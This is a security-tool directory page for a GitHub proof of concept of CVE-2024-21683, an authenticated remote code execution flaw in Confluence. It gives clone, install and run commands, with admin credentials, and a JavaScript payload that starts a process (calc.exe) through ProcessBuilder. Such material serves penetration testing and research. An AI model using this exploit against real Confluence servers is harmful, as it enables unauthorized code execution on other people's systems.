Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-21683-RCE — CVE-2024-21683 Confluence Post Auth RCE | Kitploit
Tools/GitHubGitHub/w01fh4cker/cve-2024-21683-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubw01fh4cker/cve-2024-21683-rce

CVE-2024-21683-RCE

CVE-2024-21683 Confluence Post Auth RCE

View Repository
1273322 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-21683-RCE

Credit

https://x.com/realalphaman_

https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated

Usage

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2024-21683-RCE
cd CVE-2024-21683-RCE
pip install requests bs4
python CVE-2024-21683.py -u http://192.168.198.1:8090 -au admin -ap admin -f exploit.js -n test -p http://127.0.0.1:8083

exploit.js:

root@kitploit:~
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
Download Tool